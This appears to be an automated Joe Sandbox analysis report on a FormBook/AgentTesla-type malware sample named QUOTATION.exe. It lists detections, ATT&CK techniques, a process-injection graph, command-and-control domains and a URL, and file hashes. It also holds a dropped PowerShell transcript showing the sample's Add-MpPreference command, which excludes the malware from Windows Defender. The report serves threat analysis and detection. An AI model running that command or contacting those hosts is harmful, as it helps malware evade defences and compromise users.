          Source: Yara matchFile source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Scheduled Task/Job1Process Injection512Disable or Modify Tools11Credential API Hooking1System Network Connections Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information4Security Account ManagerSystem Information Discovery112SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSSecurity Software Discovery321Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonRootkit1Cached Domain CredentialsVirtualization/Sandbox Evasion31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion31Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection512/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532906 Sample: QUOTATION.exe Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 45 www.archedbeautynw.com 2->45 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for URL or domain 2->55 57 11 other signatures 2->57 10 QUOTATION.exe 7 2->10         started        signatures3 process4 file5 39 C:\Users\user\AppData\...\lQdAGavApIJoo.exe, PE32 10->39 dropped 41 C:\Users\user\AppData\Local\...\tmp8E88.tmp, XML 10->41 dropped 43 C:\Users\user\AppData\...\QUOTATION.exe.log, ASCII 10->43 dropped 69 Uses schtasks.exe or at.exe to add and modify task schedules 10->69 71 Uses netstat to query active network connections and open ports 10->71 73 Adds a directory exclusion to Windows Defender 10->73 75 Tries to detect virtualization through RDTSC time measurements 10->75 14 QUOTATION.exe 10->14         started        17 powershell.exe 24 10->17         started        19 schtasks.exe 1 10->19         started        21 QUOTATION.exe 10->21         started        signatures6 process7 signatures8 77 Modifies the context of a thread in another process (thread injection) 14->77 79 Maps a DLL or memory area into another process 14->79 81 Sample uses process hollowing technique 14->81 83 Queues an APC in another process (thread injection) 14->83 23 NETSTAT.EXE 14->23         started        26 explorer.exe 14->26 injected 29 conhost.exe 17->29         started        31 conhost.exe 19->31         started        process9 dnsIp10 59 Self deletion via cmd delete 23->59 61 Modifies the context of a thread in another process (thread injection) 23->61 63 Maps a DLL or memory area into another process 23->63 65 Tries to detect virtualization through RDTSC time measurements 23->65 33 cmd.exe 1 23->33         started        47 purelai.store 208.51.62.42, 49786, 80 NETRANGEUS United States 26->47 49 www.purelai.store 26->49 67 System process connects to network (likely due to code injection or exploit) 26->67 35 autoconv.exe 26->35         started        signatures11 process12 process13 37 conhost.exe 33->37         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QUOTATION.exe40%VirustotalBrowse
          QUOTATION.exe18%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe18%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          17.0.QUOTATION.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          17.0.QUOTATION.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          17.2.QUOTATION.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          17.0.QUOTATION.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          purelai.store2%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX100%Avira URL Cloudmalware
          www.purelai.store/p2r0/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          purelai.store
          208.51.62.42
          truetrueunknown
          www.archedbeautynw.com
          192.185.0.218
          truefalse
            unknown
            www.purelai.store
            unknown
            unknowntrue
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnXtrue
              • Avira URL Cloud: malware
              unknown
              www.purelai.store/p2r0/true
              • Avira URL Cloud: malware
              low

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://wildcard.hostgator.com/p2r0/?U2JXS=zl7ruCTqPiUCF1LNETSTAT.EXE, 00000018.00000002.549103186.0000000003C3F000.00000004.00020000.sdmpfalse
                high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  208.51.62.42
                  purelai.storeUnited States
                  17139NETRANGEUStrue

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:532906
                  Start date:02.12.2021
                  Start time:19:53:41
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 10m 40s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:QUOTATION.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:36
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@17/8@2/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 18.4% (good quality ratio 16.4%)
                  • Quality average: 72.9%
                  • Quality standard deviation: 31.6%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  19:54:32API Interceptor1x Sleep call for process: QUOTATION.exe modified
                  19:54:36API Interceptor40x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  NETRANGEUSz0x3n.x86-20211110-2150Get hashmaliciousBrowse
                  • 173.247.233.114
                  https://bootsonagmvhhy.storage.googleapis.com/bootsizitvhjeo.html#qs=r-abacaecgjgkeacaefbicababacagbacfcaccakjbackbfahebejacbGet hashmaliciousBrowse
                  • 208.51.63.170

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION.exe.log
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):1310
                  Entropy (8bit):5.345651901398759
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                  MD5:D918C6A765EDB90D2A227FE23A3FEC98
                  SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                  SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                  SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):22272
                  Entropy (8bit):5.602934150606012
                  Encrypted:false
                  SSDEEP:384:vtCDLC0ma0M1D93bD3RYSBKnMjultI+77Y9g9SJ3xOT1Ma7ZlbAV79W07a5ZBDIL:QlBRu4KMClthf9cUCafw5iVA
                  MD5:590EFBC148FE68AA56C46E9E0FF3D7F0
                  SHA1:2690E695521BFA00E6989969BC9FB0F97E493A40
                  SHA-256:76F88D68E1EA3A3ACD8D130BDDCD5BB271D687693FE920AE14F5DE3A51453511
                  SHA-512:8AAA5F6D4B3AC305D3C0C984667BDC2805CBA4F53A51052589FBFA615BB1EE05CE82891919B57FE5214735DA8A41CE1EDD33BEDE40FFB13AE9F350A7613A93A5
                  Malicious:false
                  Preview: @...e...........y.......h.s...............J..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nyncxzs.h2v.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oorirpyr.0hv.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:XML 1.0 document, ASCII text
                  Category:dropped
                  Size (bytes):1600
                  Entropy (8bit):5.152736432421442
                  Encrypted:false
                  SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtETxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTqv
                  MD5:3CE40204A917DE9C82B360734EE652AA
                  SHA1:78B42098FA8623993EF52FEAFC39CC252BBEB99F
                  SHA-256:99E8226821AC5FF2A5871E172ED6501E3D291329979B9B81850DE9718A24898E
                  SHA-512:52B54CAD11E53A99187BC9A81C5373BEC09D0E6D2A089476B08EEE3C08A75D7632AC0571CE506DEA502A021E1B94267807E6F7A93B8D902AC50B644CE763B029
                  Malicious:true
                  Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                  C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):684032
                  Entropy (8bit):7.840372839503771
                  Encrypted:false
                  SSDEEP:12288:08wTa6ognvmGIhhzDliENR+jr2UqHblHnxAEONziF7rCAoNc+2ZYSkB:lEROGQzPNRErGJHpSzryTZ7M
                  MD5:213D8FD4B74E3B1122CFC1A9159AA579
                  SHA1:3FCEA21CA260C922F371877BEF1CEC0B2293F1E9
                  SHA-256:696BA286FA1D2D46B09DEE92733F9CA34BFE3E58F50A440A3EC89F63BBA76441
                  SHA-512:63E80F3DB6DD6130E20010841BE8C6449974FF7DA333BC692AC2F226A12339E7A6B79111CFBB6A5FB3E73D8FF6C2653E2CA664CA1347B04FC639ABB18C94C0A9
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 18%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F .a..............0..d.............. ........@.. ....................................@.................................x...O.......@............................................................................ ............... ..H............text....b... ...d.................. ..`.rsrc...@............f..............@..@.reloc...............n..............@..B........................H.......p>...F......Z...@...8............................................0..7..........=...%....r...p.......%.r...p.%.r9..p.%...(......+..*".(.....*&.(......**..(......*....(......*....(......*....0............d.......{......o.......+..*....0..3.........{....s.......o......(I.....,..rK..psO...z..}....*..0............o......0..o......0..o.....2..o.......+....,..r...pr...ps....z.o.......o....ZX..{...........,..r5..ps....z..{....o.....+_..( .........oL...........,B..{.......s/..
                  C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe:Zone.Identifier
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview: [ZoneTransfer]....ZoneId=0
                  C:\Users\user\Documents\20211202\PowerShell_transcript.609290.OySUyLIk.20211202195435.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):5801
                  Entropy (8bit):5.412304632720399
                  Encrypted:false
                  SSDEEP:96:BZ2hONGqDo1Z6Z2hONGqDo1ZVt31jZThONGqDo1ZxV8FFBZK:Sl
                  MD5:D457A5A89526EB2350FDE3583929DE9B
                  SHA1:450067DCFCB07C3E3B2F63067C9D83E0268BB9EC
                  SHA-256:B563FCC5EF242AFB3A95F52F69B4036FCFBFA64AAE1097F162A8D6EA59C55AA2
                  SHA-512:27D8CCE47162FB100FD3A48E0BCBE935F8333A149E4E0B2E8976DAA1BCF4AB86D39671B6A9162DAE0129FD2AE5F395D35FC261BF27F3EB35F7DE55D2C11B15C8
                  Malicious:false
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20211202195436..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 609290 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe..Process ID: 7120..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211202195436..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe..**********************..Windows PowerShell transcript start..Start time: 20211202195810..Username: computer\user..RunAs User: DESKTOP-716T77

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.840372839503771
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:QUOTATION.exe
                  File size:684032
                  MD5:213d8fd4b74e3b1122cfc1a9159aa579
                  SHA1:3fcea21ca260c922f371877bef1cec0b2293f1e9
                  SHA256:696ba286fa1d2d46b09dee92733f9ca34bfe3e58f50a440a3ec89f63bba76441
                  SHA512:63e80f3db6dd6130e20010841be8c6449974ff7da333bc692ac2f226a12339e7a6b79111cfbb6a5fb3e73d8ff6c2653e2ca664ca1347b04fc639abb18c94c0a9
                  SSDEEP:12288:08wTa6ognvmGIhhzDliENR+jr2UqHblHnxAEONziF7rCAoNc+2ZYSkB:lEROGQzPNRErGJHpSzryTZ7M
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F .a..............0..d............... ........@.. ....................................@................................

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x4a82ca
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x61A82046 [Thu Dec 2 01:24:22 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:v4.0.30319
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa82780x4f.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x640.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
